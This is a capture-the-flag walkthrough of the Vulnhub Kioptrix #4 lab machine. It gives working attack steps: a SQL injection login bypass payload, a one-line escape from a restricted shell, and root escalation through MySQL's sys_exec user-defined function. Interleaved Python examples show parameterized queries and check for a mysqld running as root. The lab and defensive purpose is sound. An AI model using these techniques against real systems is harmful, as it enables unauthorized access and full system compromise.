Vulnhub - Kioptrix #4 Writeup
Enumeration
Let's add kioptrix4.com to the hosts file and start with Nmap.
Nmap
Nmap scan report for www.kioptrix4.com (192.168.174.6)
Host is up, received arp-response (0.00023s latency).
Scanned at 2020-02-08 07:49:18 EST for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 08:00:27:01:71:2D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h29m56s, deviation: 3h32m08s, median: -4s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX4<00> Flags: <unique><active>
| KIOPTRIX4<03> Flags: <unique><active>
| KIOPTRIX4<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45228/tcp): CLEAN (Couldn't connect)
| Check 2 (port 17840/tcp): CLEAN (Timeout)
| Check 3 (port 22442/udp): CLEAN (Failed to receive data)
| Check 4 (port 19869/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-02-08T07:49:28-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 8 07:49:52 2020 -- 1 IP address (1 host up) scanned in 34.69 seconds
Let's check out the web application that is running on port 80.
DirBuster
http://kioptrix4.com:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/index/
/images/
/icons/
/john/
/robert/
Dirs found with a 403 response:
/cgi-bin/
/doc/
Dirs found with a 302 response:
/member/
/logout/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/index.php
/checklogin.php
Files found with a 302 responce:
/member.php
/logout.php
/john/john.php
/robert/robert.php
DirBuster found two pages named john.php and robert.php. Accessing these pages redirects us to the login page, so john and robert must be two users on this web application.
SQL Injection
The password field is prone to SQL injection, as it throws errors when we enter ' as input.
Let's try an SQL authentication bypass using the following payload.
' or 1=1#
And we are greeted with a username and password. So the backend SQL query must be something like this:
SELECT * FROM users where username='john' and password='1' or '1'='1'
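To make the bypass concrete from the defensive side, here is an added example in Python (not code from the writeup or from the Kioptrix VM) with an in-memory SQLite table standing in for the members table; the usernames and passwords are constructed placeholders. render_query builds the query string the way a string-concatenating login page does, login_vulnerable executes it, and login_safe is the parameterized version that the same input cannot bypass. SQLite does not understand MySQL's # comment, so the writeup's ' or 1=1# payload is only rendered as a string, while the input 1' or '1'='1 (which produces exactly the query shape reconstructed above) is executed against both versions.

```python
import sqlite3

# Constructed sample rows standing in for the box's `members` table (the
# table name comes from the writeup's checklogin.php; the rows are invented).
SAMPLE_MEMBERS = [
    ("john", "john-placeholder-password"),
    ("robert", "robert-placeholder-password"),
]


def _connect():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def render_query(username, password):
    """Assemble the query the way a string-concatenating PHP login page does.

    This is the defect: user input becomes part of the SQL grammar, so a
    quote in the password field closes the literal and whatever follows is
    parsed as SQL (with the writeup's `' or 1=1#`, MySQL's `#` comments out
    the dangling closing quote).
    """
    return (
        "SELECT username FROM members "
        f"WHERE username='{username}' AND password='{password}'"
    )


def login_vulnerable(username, password):
    """Concatenated query; returns the matched username or None."""
    conn = _connect()
    try:
        row = conn.execute(render_query(username, password)).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


def login_safe(username, password):
    """Parameterized query: the driver passes the values separately from the
    SQL text, so quotes in the input never reach the parser as syntax."""
    conn = _connect()
    try:
        row = conn.execute(
            "SELECT username FROM members WHERE username=? AND password=?",
            (username, password),
        ).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    bypass = "1' or '1'='1"  # yields the WHERE clause reconstructed in the writeup
    print(render_query("john", "' or 1=1#"))
    print("vulnerable:", login_vulnerable("john", bypass))  # john
    print("safe:      ", login_safe("john", bypass))        # None
```

The AND binds tighter than the OR, so the concatenated query reduces to "any row where '1'='1'", which is why the vulnerable path returns the first member regardless of the username supplied. Parameterization alone closes the injection; the empty MySQL root password and the plaintext password column the writeup goes on to find are separate weaknesses.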
Low Shell
Let's SSH into the box using the creds we got.
kali@kali:~$ ssh john@kioptrix4.com
john@kioptrix4.com's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$ lpath
Allowed:
/home/john
On login we are greeted with a restricted shell. This shell essentially limits the commands a user can run.
Alright, so we can try breaking out of this shell. There are a lot of techniques that can be used to escape restricted shells.
We can break out using the following command.
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
Low Shell Enumeration
Found MySQL creds in the checklogin.php file. We can connect to MySQL as root without a password.
john@Kioptrix4:~$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
MySQL is running as root.
root 4034 0.0 0.1 1772 524 ? S 01:32 0:00 /bin/sh /usr/bin/mysqld_safe
root 4076 0.0 4.6 127140 16452 ? Sl 01:32 0:07 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/my
root 4078 0.0 0.1 1700 556 ? S 01:32 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
Since MySQL is running as root, we can use it to escalate our privileges to root using a MySQL UDF (User Defined Function).
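As an added defender-side check (not part of the writeup), the following Python parses ps aux-style output like the listing above and flags any mysqld whose process owner or --user flag is root. The sample lines are constructed, modelled on the writeup's output with invented PIDs and sizes, and include a correctly configured second instance for contrast. The fix on a real system is to run mysqld under a dedicated account (the --user flag the listing already shows, set to mysql instead of root), so that a UDF executes as that account rather than as root.

```python
import os
import shlex

# Constructed `ps aux` output modelled on the writeup's listing. PIDs, memory
# figures and the extra rows are invented so the check has something to compare.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      4034  0.0  0.1   1772   524 ?        S    01:32   0:00 /bin/sh /usr/bin/mysqld_safe
root      4076  0.0  4.6 127140 16452 ?        Sl   01:32   0:07 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
mysql     5120  0.0  4.6 127140 16452 ?        Sl   01:40   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql-b --user=mysql --port=3307
www-data  2210  0.0  1.0  21000  4000 ?        S    01:32   0:00 /usr/sbin/apache2 -k start
"""


def parse_ps(text):
    """Split `ps aux` output into dicts. COMMAND may contain spaces, so each
    line is split at most 10 times and the remainder is kept whole."""
    procs = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        procs.append({"user": parts[0], "pid": int(parts[1]), "command": parts[10]})
    return procs


def mysqld_user_flag(argv):
    """Return the value of --user=... from a mysqld argv, or None if absent."""
    for arg in argv:
        if arg.startswith("--user="):
            return arg.split("=", 1)[1]
    return None


def audit_mysqld(text):
    """Flag every mysqld whose owner or --user flag is root.

    The mysqld_safe wrapper is a shell script and is deliberately skipped;
    what matters is the account the server process itself runs under.
    """
    findings = []
    for proc in parse_ps(text):
        argv = shlex.split(proc["command"])
        if not argv or os.path.basename(argv[0]) != "mysqld":
            continue
        user_flag = mysqld_user_flag(argv)
        if proc["user"] == "root" or user_flag == "root":
            findings.append(
                f"pid {proc['pid']}: mysqld running as root "
                f"(owner={proc['user']}, --user={user_flag}); "
                "any UDF loaded into this server executes as root"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_mysqld(SAMPLE_PS):
        print(finding)
```

Run against live output with audit_mysqld(subprocess.check_output(["ps", "aux"], text=True)); an empty list means every mysqld is confined to an unprivileged account. Pair it with a check that the MySQL root account actually has a password, since the writeup's escalation needed both conditions.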
Root Shell
So essentially we can execute commands as root using sys_exec.
Let's connect to MySQL and try it out.
john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.01 sec)
mysql> select sys_exec('touch /root/test');
+------------------------------+
| sys_exec('touch /root/test') |
+------------------------------+
| NULL |
+------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
john@Kioptrix4:~$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt lshell-0.9.12 test
So we can see that we have successfully created a file in root's home directory. So let's add john to the admin group.
john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.04 sec)
mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# cat /root/congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
root@Kioptrix4:/home/john#
And we are root!
Afterthoughts
It was an easy box but required some out-of-the-box thinking. This was my first experience with restricted shells and MySQL UDF code execution, so it was a good learning experience.